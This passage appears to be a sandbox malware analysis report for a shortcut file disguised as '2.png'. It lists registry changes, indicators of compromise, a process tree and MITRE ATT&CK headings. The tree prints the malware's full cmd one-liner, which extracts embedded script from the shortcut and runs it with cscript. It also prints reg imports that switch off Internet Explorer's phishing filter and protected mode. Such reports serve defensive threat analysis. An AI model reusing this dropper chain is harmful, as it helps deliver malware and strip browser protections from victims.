cd1346b5ae4b65081441dcdb98e37881bf8123a4dea93ff0ef9eb9220b5409300f24a4c52320666ca5b8c067b11a58d1e6ed3c42efd2f7507c1c96d962755779cc26e57135ddfe822f0da741fa735cf701eb0356f4cd6df3d848dcdb2af92c137184b00f0f96dbc265a23fcf2fb8e457b84bb4ce0e2fe09b00a2c8b76681738effe029b91ba39e09c84dca03d8bb0328fc149cda984ca445e779318112b33c688724a0a91a136cf26fac549114e1b3effc8c6a05653bd5cc3ad688605a96141b3fc1c0bf24264a3f5e702ba16dbbd8ef8defb7d1643dd37d5c3d9d152effef985c4b7a970dc2353459ea1e7f25034cc60e99c7d698e668fec2f3a01eb229af32ffbabb590363a8f53282ffae6db560df37fbd0aba2418728bbba483c7b7eda9cc461ed005f24918274ad8c2e4b2be945f8dad20752b4595858b1ae8b4000000082a3c48b28d71322b6291fa1ed71c46c5b203cfd10c6df3a11ff0468b225554e3d26c4aaa0a5d1bb8edb982b9dfab63df5d675d4080ace2b78e70f1e0899a5ae	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListPreviousDownloadUrl = "https://iecvlist.microsoft.com/IE11/1379465767093/iecompatviewlist.xml"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000005e02886826d6a785b53d9ece745418be272a752fed188b0dad9b833804a69e09000000000e800000000200002000000034f955a1202c08a5934a797940963d199a0bfba6469615618183364b57997a2c90000000c93a337b054a7b2220fbe27513dd0c7ef1ec1574b04eeb3309061585ee60c579c959f8c46ff3f707c3dc5c1557cf9e00dfbeac1853c59ecb376d634d9323285379e897d2fa69332f636663bc820433c7d1b53ac3a7450003baf3266f9b91cd609c18688d22b7559d832aa8870145d606e4fe14b7c0648bc8fbe39e76c8685dd8e5cf414a99c89b9fa197026bb4bc153240000000b94f1a861223816a442eb95130b911cea538c0782bcbf6948779a98fb0d2594e491469f6199ab1110f34c72b486277569a28bb58da05e9f192ec2c8f9a66f0a7	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\VersionLow = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000004654263316fde3131f782606abf1cc29711bcd5e56769aa3dfb58db899479174000000000e80000000020000200000007cffef7281ffeadcb70afc9d264b8871260cfd5d50a8d70eb96aecee2ff2d84b80020000bd4e2398dfae3bbc38943fcfa2e74ba5c3493b7a5b2181ed0366d8916e152f12db8a9a6e6d0587958576dca24f7e423c091c8b74e0645ed9aa0f23e5e3449bf58be03de3a9acca667835977a7808ab65e0e3cd7c33efbabc3133f17d477189308e997feb02ffa2845932f8c73d1e616a46b4dae1446f3d36d04c2caef3cd90e16eeccee79c2ecce3537a81e190a8f52a0515f320d832ac7dbb8574a470327346fb5b8488a9ab2e997f184eafc38c7541efbc76d9f157f64111857e6d06bec0eae763d1a2c6b620dc1a4b48c85ae961200edc01250730210356e3f5f8fbcd936609b57c0cec76741757f360834c8db173c3dccab88e063645d5294c0ee40453043a8de2a79cc9f218a1f0f9c018b0f7b2dd86b6a1a659db6a6fa39fe4e3e8d7eaff4844fa6662fa736ab7141ade52a41680b9eeae94e614783269b971eed521594a27867a01816c04794d09757376ab14a330e5493fbd3a62f9e33698f12b309f1cc829b00d8955e7853697338a04681061de999c90ffd2dcfea36aa57e2d89c1fd494aeec63176f074f25b43883830be401b2e2a6ec093c623146255495693e0bdc23ba9525e84ea9c5bf741edc3eae19d5fdb5a1e36fbf6d2483ef3a2dfeffd15ead0a12420cb9c3cbc5e2534afff33d0a036f34a14e63e021fb67140ab7603921c6224ecc1ad93d81ee1b0c42b972a62ce7b19c756a4a5b9cb0f22ffad9398041383d52b77189f8f33e3dbc2f460b71b307c48b6542d8b8cc3b610c2a89478777c7a8f95320f2a372300bd6e77424378e032adcda24168bed716f209c7aaf61ddfe629d469712c5c09001e5aefbd69510b448af3d6803bcb7d30322018c36a2c0a5b8b0e5a8349f34b3d8afa6ec568e3feff32255e0e64b03c2159e4981f1a40000000788fa5084a7bb99eb6984112bec26f74433c0ea487dc143b1ebe72f30e2ca0971e2faf35e37d1e039f459431118a42eafad241264f9adaa0654f9e1408fbfbe8	iexplore.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
268	cmd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1028	IEXPLORE.EXE
1028	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1596 wrote to memory of 268	1596	cmd.exe	28
PID 1596 wrote to memory of 268	1596	cmd.exe	28
PID 1596 wrote to memory of 268	1596	cmd.exe	28
PID 268 wrote to memory of 472	268	cmd.exe	29
PID 268 wrote to memory of 472	268	cmd.exe	29
PID 268 wrote to memory of 472	268	cmd.exe	29
PID 268 wrote to memory of 532	268	cmd.exe	30
PID 268 wrote to memory of 532	268	cmd.exe	30
PID 268 wrote to memory of 532	268	cmd.exe	30
PID 268 wrote to memory of 668	268	cmd.exe	31
PID 268 wrote to memory of 668	268	cmd.exe	31
PID 268 wrote to memory of 668	268	cmd.exe	31
PID 268 wrote to memory of 860	268	cmd.exe	32
PID 268 wrote to memory of 860	268	cmd.exe	32
PID 268 wrote to memory of 860	268	cmd.exe	32
PID 268 wrote to memory of 1504	268	cmd.exe	33
PID 268 wrote to memory of 1504	268	cmd.exe	33
PID 268 wrote to memory of 1504	268	cmd.exe	33
PID 1504 wrote to memory of 1832	1504	cscript.exe	35
PID 1504 wrote to memory of 1832	1504	cscript.exe	35
PID 1504 wrote to memory of 1832	1504	cscript.exe	35
PID 1832 wrote to memory of 1636	1832	cscript.exe	37
PID 1832 wrote to memory of 1636	1832	cscript.exe	37
PID 1832 wrote to memory of 1636	1832	cscript.exe	37
PID 1636 wrote to memory of 1364	1636	cscript.exe	39
PID 1636 wrote to memory of 1364	1636	cscript.exe	39
PID 1636 wrote to memory of 1364	1636	cscript.exe	39
PID 1636 wrote to memory of 1196	1636	cscript.exe	40
PID 1636 wrote to memory of 1196	1636	cscript.exe	40
PID 1636 wrote to memory of 1196	1636	cscript.exe	40
PID 1636 wrote to memory of 2032	1636	cscript.exe	43
PID 1636 wrote to memory of 2032	1636	cscript.exe	43
PID 1636 wrote to memory of 2032	1636	cscript.exe	43

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\2.png.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "2.png*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "2.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious behavior: RenamesItself
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "2.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:532
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:860
- - C:\Windows\system32\cscript.exe
    cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Windows\System32\cscript.exe
      "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1832
    - - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1636
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.reg
        6⤵
        
        PID:1364
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\mediaIE.reg
        6⤵
        Modifies Internet Explorer Automatic Crash Recovery
        Modifies Internet Explorer Phishing Filter
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        
        PID:1196
      - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        6⤵
        
        PID:2032

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1156
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1156 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1596-53-0x000007FEFC441000-0x000007FEFC443000-memory.dmp

Filesize
8KB

Download
memory/1636-62-0x0000000001C90000-0x0000000001CA0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads